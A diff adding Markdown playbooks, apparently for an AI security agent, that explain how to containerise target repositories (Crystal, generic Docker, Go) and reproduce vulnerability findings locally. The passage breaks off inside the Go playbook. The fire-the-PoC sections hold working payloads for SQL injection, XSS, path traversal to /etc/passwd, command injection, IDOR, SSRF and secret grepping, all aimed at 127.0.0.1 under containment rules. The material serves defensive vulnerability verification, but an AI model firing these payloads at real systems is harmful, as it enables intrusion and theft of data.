+If the build fails, capture `docker logs` / compiler output — a build failure is
+itself a valid `build-only` outcome (section 9), not a dead end.
+
+## 6. Seed — minimal state for auth/stateful PoCs
+
+Only seed what the PoC strictly needs; keep it inside the container.
+
+- **Migrations:** Lucky `crystal run tasks.cr -- db.migrate` (or
+  `lucky db.create && lucky db.migrate`); Amber `amber db migrate`; raw — run
+  the project's `db/migrations/*.sql` against `vuln-db`.
+- **Seed/test user:** prefer the project's own seed task
+  (`crystal run tasks.cr -- db.seed`, `amber db seed`). If none, insert a single
+  throwaway account directly:
+
+  ```sh
+  docker exec -i vuln-db psql -U postgres -d app_development \
+    -c "INSERT INTO users (email, password_digest, role) \
+        VALUES ('poc@local.test', crypt('poc-pass', gen_salt('bf')), 'user');"
+  ```
+
+  Use obviously-fake, local-only credentials (`poc@local.test` / `poc-pass`).
+  Never real or production-shaped secrets. Record exactly what you seeded in
+  `Repro.setup_commands`.
+
+## 7. Fire the PoC safely
+
+Send the exploit at the local container only. Containment rules (binding):
+
+- Target is always `http://127.0.0.1:<port>` (the mapped container) — never an
+  external host or a URL pulled from the finding's real-world context.
+- Use the throwaway creds from section 6; no real tokens/cookies.
+- For SSRF/file-read PoCs, prove impact with a benign in-container marker (e.g.
+  read `/etc/passwd` or hit `http://127.0.0.1:<port>/_internal`) — do not reach
+  out to the internet or cloud metadata endpoints.
+- Capture request + response verbatim for `Repro.observed` (the evidence).
+
+Examples — adapt to the finding's `dynamic_poc_plan`:
+
+```sh
+# SQL injection (auth bypass / boolean) — observe row count or 200 vs 401:
+curl -sS -i "http://127.0.0.1:3000/search?q=%27%20OR%201%3D1--%20"
+
+# Reflected XSS — observe payload echoed unescaped in the body:
+curl -sS "http://127.0.0.1:3000/greet?name=<script>alert(1)</script>" | grep -F '<script>'
+
+# Path traversal — observe file contents leaking:
+curl -sS "http://127.0.0.1:3000/files?path=../../../../etc/passwd"
+
+# OS command injection (Process.run shell:true sink) — observe injected output:
+curl -sS "http://127.0.0.1:3000/ping?host=127.0.0.1;id"
+
+# Auth'd IDOR — login, reuse cookie, access another id (all local):
+curl -sS -c /tmp/cj -d 'email=poc@local.test&password=poc-pass' \
+  http://127.0.0.1:3000/login
+curl -sS -b /tmp/cj "http://127.0.0.1:3000/orders/1"   # id you do not own
+```
+
+Save the transcript:
+
+```sh
+{ echo "# request"; echo "$REQ"; echo "# response"; echo "$RESP"; } > /tmp/poc-evidence.txt
+```
+
+If the observed behavior matches the predicted impact, set
+`Repro.reproduced=true`, `method=live-exploit`, and paste request+response into
+`observed`.
+
+## 8. Teardown
+
+Leave no containers, networks, volumes, or worktree behind:
+
+```sh
+docker rm -f vuln-crystal vuln-db 2>/dev/null || true
+docker compose down -v 2>/dev/null || true       # if compose was used
+docker network rm vulnnet 2>/dev/null || true
+docker image rm vuln-crystal:poc 2>/dev/null || true
+
+# Remove the worktree if you created it manually (skip if the harness owns it):
+git -C /path/to/target worktree remove --force /tmp/vuln-crystal
+```
+
+If the harness provided the worktree (`isolation:'worktree'`), it is reclaimed
+automatically — do not call `worktree remove` on it.
+
+## 9. Fallbacks — when it cannot run live
+
+Degrade gracefully and set `Repro.method` to match what you actually achieved:
+
+1. **Unit/spec PoC (`method=unit-test`)** — if the app won't boot (missing
+   service, broken migration) but the vulnerable function is reachable in
+   isolation, write a Crystal spec under `spec/` that drives the source→sink path
+   and asserts the exploit. Run it in the image:
+
+   ```sh
+   docker run --rm -v "$PWD":/app -w /app crystallang/crystal:latest \
+     sh -c 'shards install && crystal spec spec/poc_spec.cr'
+   ```
+
+   A green assertion proving the unsafe behavior is the evidence.
+
+2. **Build-only (`method=build-only`)** — if it compiles but cannot be exercised
+   (no usable entry point), record the successful `crystal build` and the static
+   source→sink trace; impact stays argued, not observed.
+
+3. **Static PoC (`method=static-poc`)** — if nothing builds (toolchain/dep
+   unavailable, version skew), fall back to the proven static trace: cite the
+   exact `file:line` source→sink, the missing sanitizer, and a crafted payload
+   that would trigger it. Set `reproduced=false`, explain the blocker in `notes`.
+
+Always record the actual environment (image tag, Crystal version, commit SHA) in
+`Repro.environment`, and the exact commands in `Repro.setup_commands`, so the
+finding is replayable.
diff --git a/plugins/security/prompts/playbooks/generic-docker.md b/plugins/security/prompts/playbooks/generic-docker.md
new file mode 100644
index 0000000..bb9da2a
--- /dev/null
+++ b/plugins/security/prompts/playbooks/generic-docker.md
@@ -0,0 +1,408 @@
+# ENV Playbook — Generic Docker
+
+Build, run, and exploit a target whose ground truth is its **Docker** packaging
+(a `Dockerfile` and/or `docker-compose.yml`) rather than a recognized language
+toolchain — or any target where the language playbook is missing and Docker is
+the reliable common denominator. This is also the universal isolation layer the
+other playbooks defer to. Docker-first by definition; the host may have **no**
+native toolchain for whatever lives inside the image. Use plain `docker build`/
+`docker run` as the reliable path; treat `docker compose` as opportunistic (the
+plugin is not guaranteed). Keep ALL traffic inside the local container — no
+external hosts, no real credentials, no data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only). The defining signal is a
+container manifest at or near the repo root:
+
+```sh
+ls Dockerfile* Containerfile docker-compose.yml docker-compose.yaml \
+   compose.yml compose.yaml .dockerignore 2>/dev/null
+find . -maxdepth 3 \( -iname 'Dockerfile*' -o -iname 'Containerfile' \
+   -o -iname 'docker-compose*.y*ml' -o -iname 'compose.y*ml' \) | head
+```
+
+- **Manifests:**
+  - `Dockerfile` / `Containerfile` — the build recipe. `FROM` reveals the real
+    underlying stack (e.g. `FROM node:22`, `FROM python:3.12`, `FROM golang`).
+    If a language playbook matches that base, prefer it for the inner details
+    and use this one only for the container plumbing.
+  - `docker-compose.yml` / `compose.yaml` — multi-service topology: which
+    services exist, build contexts, exposed ports, env, volumes, and
+    dependencies (`depends_on`).
+  - `.dockerignore` — what the project itself excludes from the build context.
+- **Read the Dockerfile** — it is the ground truth for build steps, exposed
+  port, and start command:
+
+  ```sh
+  grep -nE '^(FROM|ARG|ENV|EXPOSE|WORKDIR|ENTRYPOINT|CMD|USER)' Dockerfile
+  ```
+
+  - `EXPOSE <port>` → the in-container listen port (map this).
+  - `ENTRYPOINT` / `CMD` → how the app starts (this is what runs by default).
+  - `FROM ... AS build` (multi-stage) → the final stage is the runtime; earlier
+    stages are throwaway build tooling.
+- **Read the compose file** — services, ports, and the entry service:
+
+  ```sh
+  # Prefer a real parse; fall back to grep if no compose plugin / python yaml:
+  docker compose config 2>/dev/null \
+    || python3 -c 'import yaml,sys;print(yaml.safe_load(open("docker-compose.yml")))' 2>/dev/null \
+    || grep -nE '^( {2,4})?(services|build|image|ports|environment|depends_on|command):' docker-compose.yml
+  ```
+
+  - `ports: ["8080:80"]` → host:container; the container side is what the app
+    listens on.
+  - The service with the build context that holds the vulnerable code is the
+    **app under test**; sidecars (db, redis, etc.) are support services.
+- **No language playbook applies, no `FROM` you recognize:** treat the image as
+  opaque and drive it purely through its declared port + entrypoint.
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+Keep the build context lean and the host's git/state out of the image. Respect
+the project's own `.dockerignore`; only add one if it is missing:
+
+```sh
+[ -f .dockerignore ] || printf '.git\n' > /tmp/va-$FID.dockerignore
+```
+
+Use a finding-scoped compose project name (`-p va-$FID`) and unique image/
+container names so parallel repros never collide and teardown is exact.
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker (the common case here)
+
+This is the whole point of the stack — the project's own definition wires up
+the build, env, ports, dependent services, and the correct entrypoint.
+
+```sh
+# Plain docker with the repo Dockerfile (the reliable path).
+# Honor an alternate filename / build context if the project uses one:
+docker build -f Dockerfile -t $IMG .          # add --build-arg KEY=val if required by ARG
+```
+
+If the build context is a subdirectory (compose `build.context`), build from
+there: `docker build -f path/to/Dockerfile -t $IMG path/to/context`.
+
+```sh
+# Compose — opportunistic; only when the plugin exists AND the app needs its
+# sidecars (DB, cache) to boot. Brings up the whole topology:
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+```
+
+When compose is unavailable but the app needs a sidecar (e.g. Postgres), stand
+the dependency up by hand on a shared user network and point the app at it:
+
+```sh
+docker network create va-net-$FID 2>/dev/null
+docker run -d --name va-db-$FID --network va-net-$FID \
+  -e POSTGRES_PASSWORD=poc -e POSTGRES_DB=app postgres:16-alpine
+# then run the app on the same network with DATABASE_URL pointing at va-db-$FID
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Reaching here means recon found a compose `image:` (no build) or only loose
+files. Two sub-cases:
+
+- **Compose references a prebuilt `image:` (no `build:`):** just pull and run it
+  through compose, or `docker run` that image directly with the declared ports/
+  env. There is nothing to build.
+- **Loose files, unknown stack:** infer the runtime from what is present and
+  wrap it in a small base. Prefer the matching language playbook if one fits;
+  otherwise a generic Debian base plus the obvious install/start:
+
+  ```sh
+  cat > /tmp/Dockerfile.$FID <<'EOF'
+  FROM debian:12-slim
+  RUN apt-get update && apt-get install -y --no-install-recommends \
+        ca-certificates curl \
+    && rm -rf /var/lib/apt/lists/*
+  WORKDIR /app
+  COPY . .
+  # Install + start are stack-specific — set them from the files found:
+  #   static site:   RUN apt-get install -y python3   (serve with python3 -m http.server)
+  #   shell/binary:  RUN chmod +x ./run.sh
+  EXPOSE 8080
+  CMD ["sh", "-c", "echo 'set a real start command' && sleep infinity"]
+  EOF
+
+  docker build -f /tmp/Dockerfile.$FID --iidfile /tmp/va-$FID.iid -t $IMG .
+  ```
+
+The start command is whatever the Dockerfile `CMD`/`ENTRYPOINT` or compose
+`command:` declares. Bind the listener to `0.0.0.0`, not `127.0.0.1`, or a `-p`
+map cannot reach it (see Run & health-check for the loopback workaround).
+
+---
+
+## 4. Dependencies
+
+There is no separate restore step — for a Docker target, dependency install is
+**baked into the image build** (the Dockerfile's `RUN`/`COPY` layers, or the
+base `image:`'s contents). Notes:
+
+- Build deps reproducibly and from the pinned manifests the Dockerfile copies in
+  (e.g. `npm ci`, `pip install -r requirements.txt`, `go mod download`,
+  `bundle install`). Do **not** edit the Dockerfile to bump versions — that
+  changes the audited dependency set.
+- **Build-time `ARG`s:** if the build fails on a missing `ARG`, read the
+  `ARG`/`ENV` lines and pass safe placeholders
+  (`--build-arg NODE_ENV=development`). Never pass real secrets.
+- **Private registries / base images that won't pull:** if `FROM` points at a
+  private registry that needs auth, do not supply real credentials — note it and
+  fall back (build-only / static-poc).
+- **BuildKit secrets / SSH mounts** (`--mount=type=secret`): the build may need
+  `DOCKER_BUILDKIT=1`. Provide only a dummy secret file if one is strictly
+  required to get past the layer; never a real one.
+- Multi-stage builds already isolate build tooling from the runtime — let them;
+  do not flatten or alter the stages.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name. Map the host port to whatever the container listens on (the
+`EXPOSE` / compose `ports` container side):
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+CPORT=8080            # the in-container port from EXPOSE / compose ports / the listen call
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:$CPORT $IMG
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. If the
+project used compose, the published ports are already bound — find the mapped
+host port instead of re-running:
+
+```sh
+docker compose -p va-$FID ps                       # see published ports
+docker port "$(docker compose -p va-$FID ps -q <app-service>)" $CPORT
+```
+
+**If the app binds `127.0.0.1` inside the container,** a `-p` map can't reach it
+(loopback is per-namespace). Either fire the PoC from inside the container
+(`docker exec $CN ...`), or run with `--network host` on Linux so the
+container's loopback is the host's:
+
+```sh
+docker run -d --name $CN --network host $IMG       # then target 127.0.0.1:<code-port>
+```
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -fsS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+docker ps --filter "name=$CN"      # confirm it didn't immediately exit
+```
+
+A 404 on `/` still means the server is up — any TCP/HTTP response counts as
+healthy. If the container exits immediately, `docker logs` shows why (missing
+env, dependent DB not ready, bad `CMD`). For a non-HTTP service, probe the port
+with `docker exec $CN sh -c 'curl ... || nc -z 127.0.0.1 $CPORT'` or the
+relevant client. Common exposed ports follow the inner stack (web **8080/3000/
+5000/8000/80**, Postgres **5432**, MySQL **3306**, Redis **6379**) — but the
+Dockerfile/compose declaration is ground truth.
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **Compose stacks** usually declare the DB and may auto-run migrations on boot
+  (`depends_on`, an entrypoint script, or a one-shot `migrate` service). Check
+  the compose file before seeding by hand. Run the project's own migration/seed
+  inside the app container:
+
+  ```sh
+  docker exec $CN sh -c '<project migrate cmd>'    # e.g. rails db:migrate, npm run migrate, ./manage.py migrate
+  docker exec $CN sh -c '<project seed cmd>' 2>/dev/null || true
+  ```
+
+- **Standalone sidecar DB** (started in step 3): create the schema/user the app
+  expects via the app's own migration command, or `docker exec va-db-$FID ...`
+  with the DB client for a single synthetic row.
+
+- **Auth flow:** if the PoC needs a session/token, register or log in via the
+  app's own endpoint with synthetic creds and keep the cookie jar / capture the
+  token:
+
+  ```sh
+  # Cookie-session apps:
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/login"
+
+  # Bearer/JWT apps — capture the token for the Authorization header:
+  TOKEN=$(curl -s -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/auth/login" \
+    | python3 -c 'import sys,json;d=json.load(sys.stdin);print(d.get("token") or d.get("access_token",""))')
+  ```
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples by class (stack-agnostic —
+the container's declared port is the only entry point you target):
+
+```sh
+# SQL/NoSQL injection — observe error or extracted marker in the response:
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/user?id=1%20OR%201=1--" | tee /tmp/poc.$FID.out
+
+# Path traversal / arbitrary file read — pull a file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+
+# Command injection / RCE — prove exec via a benign in-container sentinel, then
+# read it back (NEVER destructive commands):
+curl -s "http://127.0.0.1:$PORT/ping?host=127.0.0.1;touch%20/tmp/va-pwned"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host.
+# Start a canary on $CN's own network namespace, then make the app fetch it:
+docker run -d --name va-canary-$FID --network "container:$CN" \
+  python:3-slim python3 -c 'import http.server,socketserver;socketserver.TCPServer(("127.0.0.1",9999),type("H",(http.server.BaseHTTPRequestHandler,),{"do_GET":lambda s:(s.send_response(200),s.end_headers(),s.wfile.write(b"CANARY"))})).serve_forever()'
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/" | grep -o CANARY
+
+# Reflected/stored XSS — confirm the payload is reflected unescaped:
+curl -s "http://127.0.0.1:$PORT/profile?name=%3Cscript%3Ealert(1)%3C/script%3E" \
+  | grep -o '<script>alert(1)</script>'
+```
+
+Docker-specific findings to fire against the running container itself:
+
+```sh
+# Container hardening / privilege — confirm the image runs as root (CWE-250) or
+# the container is over-privileged (misconfig). Evidence is the observed state:
+docker inspect -f '{{.Config.User}}' $CN          # empty/"root"/"0" => runs as root
+docker exec $CN id                                 # uid=0(root) confirms it
+docker exec $CN sh -c 'cat /proc/1/status | grep -i cap'   # effective capabilities
+
+# Hardcoded secrets baked into the image (CWE-798) — surface them from the
+# layers/env WITHOUT exfiltrating; print to local evidence only:
+docker exec $CN env | grep -iE 'pass|secret|token|key' | tee -a /tmp/poc.$FID.out
+docker history --no-trunc $IMG | grep -iE 'pass|secret|token|key' | head
+
+# Exposed/dangerous Docker socket mount (compose volumes: /var/run/docker.sock)
+# — if mounted, prove host-control reachability from inside the container:
+docker exec $CN sh -c 'test -S /var/run/docker.sock && echo DOCKER_SOCK_EXPOSED'
+```
+
+Evidence to record for the repro result:
+
+- The exact request/command (method, path, headers, body, or `docker` invocation)
+  → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, reflected script, `uid=0`, leaked secret, exposed socket, 500 with
+  stack) → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`'s network; no
+outbound connections to real hosts; no real data; side effects are benign
+sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN va-canary-$FID va-db-$FID 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker network rm va-net-$FID 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID \
+      /tmp/va-$FID.dockerignore /tmp/va-$FID.iid
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`).
+
+1. **Image builds but the app can't fully serve (missing sidecar, env, or the
+   PoC targets a single function):** drive the vulnerable code path directly
+   inside the container — exec the app's own test, or a one-off harness that
+   calls the sink in whatever runtime the image provides. Set
+   `method: unit-test`.
+
+   ```sh
+   # Run the project's own focused test inside the image (command is stack-specific):
+   docker run --rm -v "$WT":/app -w /app $IMG sh -c '<test cmd for the matched stack>'
+   ```
+
+   For a Docker-config finding that has no running-app surface (e.g. proving the
+   built image runs as root or ships a secret), the build itself plus the
+   `docker inspect`/`docker history` evidence in step 7 IS the proof — record it
+   here as `method: unit-test` (config assertion) or `build-only` per fidelity.
+
+2. **Image builds but won't start at all (dependent DB/service absent, bad
+   entrypoint, private base resolved but service deps missing):** record that
+   `docker build` succeeds, the dependency set installs, and the vulnerable code
+   /misconfiguration is present in the image, with the line-referenced
+   source→sink (or Dockerfile/compose line) as evidence. Set `method: build-only`.
+
+   ```sh
+   docker build -f Dockerfile -t $IMG . && echo BUILD_OK
+   ```
+
+3. **Cannot build at all (base image won't pull, private registry, BuildKit
+   secret unavailable, network blocked):** construct a static PoC — the exact
+   crafted input (or the offending Dockerfile/compose lines) plus the
+   line-referenced source→sink path showing why it triggers. Set
+   `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/go.md b/plugins/security/prompts/playbooks/go.md
new file mode 100644
index 0000000..3265ad0
--- /dev/null
+++ b/plugins/security/prompts/playbooks/go.md
@@ -0,0 +1,411 @@
+# ENV Playbook — Go
+
+Build, run, and exploit a Go target (net/http / gin / echo / chi / fiber /
+gRPC, or a plain CLI / library) to reproduce a candidate finding with a real
+PoC. Docker-first; the native Go toolchain may be absent on the host. Keep ALL
+traffic inside the local container — no external hosts, no real credentials, no
+data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls go.mod go.sum go.work vendor/modules.txt Dockerfile docker-compose.yml 2>/dev/null
+find . -maxdepth 3 -name '*.go' -not -path '*/vendor/*' | head
+```
+
+- **Manifests:** `go.mod` (always for modules) declares the module path and the
+  `go` directive (the language/toolchain version — match the image to it).
+  `go.sum` pins dependency hashes. `go.work` means a multi-module workspace.
+- **Vendoring:** a `vendor/` dir with `vendor/modules.txt` → deps are checked in;
+  build offline with `-mod=vendor` (the default when `vendor/` is present).
+- **Entry point:** a `package main` with a `func main()` is a runnable binary.
+  Find it (and any `cmd/<name>/main.go` layout — Go's convention for multiple
+  binaries):
+
+  ```sh
+  grep -rl '^package main' --include='*.go' . | grep -v /vendor/
+  grep -rln 'func main' --include='*.go' . | grep -v /vendor/
+  ls cmd/ 2>/dev/null
+  ```
+
+- **Framework tells** (read `go.mod` `require` block, or imports):
+  - stdlib server → `net/http` (`http.ListenAndServe`, `http.HandleFunc`).
+  - Gin → `github.com/gin-gonic/gin`. Echo → `github.com/labstack/echo`.
+  - Chi → `github.com/go-chi/chi`. Fiber → `github.com/gofiber/fiber`
+    (fasthttp-based). gorilla/mux → `github.com/gorilla/mux`.
+  - gRPC → `google.golang.org/grpc`; usually a separate `*.proto` + generated
+    `*.pb.go`. Default port often `50051`.
+  - Library / CLI (no `ListenAndServe`, no `package main` server) → nothing to
+    serve; go to Fallbacks and drive the sink from a Go test.
+- **The listen address is ground truth.** Find the port and bind address — you
+  must map and bind exactly what the code listens on:
+
+  ```sh
+  grep -rnE 'ListenAndServe|\.Run\(|\.Listen\(|net\.Listen' --include='*.go' . | grep -v /vendor/
+  ```
+
+  Note whether it binds `:8080` (all interfaces, mappable) vs `127.0.0.1:8080`
+  (loopback only — see Run & health-check for how to still reach it).
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+Keep the build context lean and out of the host's reach (the Dockerfile below
+copies the source in fresh; vendored deps come with it):
+
+```sh
+printf '.git\n*.test\n' > /tmp/va-$FID.dockerignore
+```
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up the build flags, env,
+DB, and the correct entry binary for you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Pick the Go tag from the `go` directive in `go.mod` (fall back to a recent
+stable, e.g. `golang:1.23-bookworm`). A multi-stage build compiles in the SDK
+image and runs the static binary in a tiny base — fast to start, nothing extra
+in the runtime.
+
+```sh
+# Resolve the main package path (default to repo root "."):
+MAINPKG=$(grep -rl '^package main' --include='*.go' "$WT" | grep -v /vendor/ | head -1)
+MAINPKG=${MAINPKG:+./$(dirname "${MAINPKG#$WT/}")}; MAINPKG=${MAINPKG:-.}
+
+cat > /tmp/Dockerfile.$FID <<EOF
+FROM golang:1.23-bookworm AS build
+WORKDIR /src
+# Copy manifests first for layer caching; tolerate a missing go.sum.
+COPY go.mod ./
+COPY go.sum* ./
+# Pre-fetch deps when not vendored (skipped automatically if vendor/ exists).
+RUN test -d vendor || go mod download
+COPY . .
+# CGO off → a static binary that runs in a scratch/distroless base.
+# If the project needs cgo (sqlite3, etc.), drop CGO_ENABLED and use a glibc base.
+RUN CGO_ENABLED=0 go build -o /out/app $MAINPKG
+
+FROM gcr.io/distroless/base-debian12
+COPY --from=build /out/app /app
+EXPOSE 8080
+ENTRYPOINT ["/app"]
+EOF
+
+docker build -f /tmp/Dockerfile.$FID --iidfile /tmp/va-$FID.iid -t $IMG "$WT"
+```
+
+If the runtime needs a shell or extra tooling for the PoC (e.g. command-injection
+sentinels), swap the runtime stage to `debian:12-slim` or build the binary into
+the `golang` image and run from there directly:
+
+```sh
+docker run -d --name $CN -p 127.0.0.1:$PORT:8080 -w /src -v "$WT":/src:ro \
+  golang:1.23-bookworm sh -c "CGO_ENABLED=0 go build -o /tmp/app . && /tmp/app"
+```
+
+Start command, by how the project runs (the binary must bind `0.0.0.0` /
+`:PORT`, not `127.0.0.1`, or the mapped host port can't reach it):
+
+- **Single server binary:** the built `/app` is the entry (the `ENTRYPOINT`
+  above). Pass config via flags/env at run time.
+- **Multiple binaries (`cmd/<name>`):** build the specific one
+  (`go build -o /out/app ./cmd/<name>`) — pick the server, not a migrator/CLI.
+- **Reads `PORT`/`ADDR` from env:** pass it (`-e PORT=8080`). Many Go servers
+  hardcode the listen addr — read the `ListenAndServe` arg; if it's
+  `127.0.0.1:8080`, see Run & health-check for the loopback workaround.
+- **Library / CLI only:** nothing to serve → Fallbacks, `method: unit-test`.
+
+---
+
+## 4. Dependencies
+
+Restore reproducibly; `go.sum` makes installs hash-verified and deterministic:
+
+```sh
+go mod download        # fetch modules listed in go.mod into the build cache
+go mod verify          # confirm cached modules match go.sum hashes
+```
+
+- **Vendored repos** (`vendor/` present): builds use it automatically; force it
+  with `go build -mod=vendor ./...`. No network needed — preferred when offline.
+- Do **not** `go get -u` / bump versions — that changes the audited dependency
+  set. Honor `go.mod`/`go.sum` exactly (`-mod=readonly`, the default for
+  modules, errors if a build would mutate them).
+- **cgo:** if a dep imports C (e.g. `mattn/go-sqlite3`), `CGO_ENABLED=0` fails to
+  build. Use `CGO_ENABLED=1` with a glibc base (`golang:1.23-bookworm` has gcc)
+  and run from a `debian:12-slim` runtime, not distroless/scratch.
+- **Private modules** (`GOPRIVATE`): if a require path can't resolve, it likely
+  needs auth — out of scope; do not supply real credentials. Note it and fall
+  back if the build blocks.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:8080 \
+  -e PORT=8080 -e ADDR=0.0.0.0:8080 \
+  $IMG
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Map the
+container port (`:8080`) to whatever the code actually listens on (read the
+`ListenAndServe` arg — common defaults: net/http/chi/gorilla **8080**, Gin
+**8080**, Echo **1323**, Fiber **3000**, gRPC **50051**).
+
+**If the app binds `127.0.0.1` inside the container,** a `-p` map can't reach it
+(loopback is per-namespace). Either fire the PoC from inside the container
+(`docker exec $CN ...`, but distroless has no shell — use a `debian:12-slim`
+runtime), or run with `--network host` on Linux so the container's loopback is
+the host's:
+
+```sh
+docker run -d --name $CN --network host $IMG    # then target 127.0.0.1:<code-port>
+```
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -fsS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+```
+
+A 404 on `/` still means the server is up — any TCP/HTTP response counts as
+healthy. Look for the framework boot line in the logs (`Listening on`, Gin's
+`[GIN-debug] Listening and serving HTTP on`, Echo's banner, `http: server
+started`). For a **gRPC** target, plain `curl` won't health-check it; use
+`docker exec $CN /app -test` only if it offers one, or probe with `grpcurl`
+(see Fire the PoC).
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **DB-backed app:** Go projects rarely ship an ORM auto-migrate CLI — check for
+  a migrations dir (`migrations/`, `db/`) and a tool (`golang-migrate`, `goose`,
+  `atlas`), or a `make migrate` / project subcommand. Run it inside the
+  container:
+
+  ```sh
+  docker exec $CN /app migrate 2>/dev/null \
+    || docker exec $CN sh -c 'migrate -path /migrations -database "$DATABASE_URL" up 2>/dev/null' \
+    || true
+  ```
+
+  If the app embeds an in-process SQLite/embedded store, it usually creates the
+  schema on boot — nothing to seed beyond the auth step below.
+
+- **Auth flow:** if the PoC needs a session/token, register or log in via the
+  app's own endpoint with synthetic creds and keep the cookie jar / capture the
+  token:
+
+  ```sh
+  # Cookie-session apps:
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/login"
+
+  # JWT/bearer apps — capture the token for the Authorization header:
+  TOKEN=$(curl -s -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/auth/login" \
+    | python3 -c 'import sys,json;d=json.load(sys.stdin);print(d.get("token") or d.get("access_token",""))')
+  ```
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class:
+
+```sh
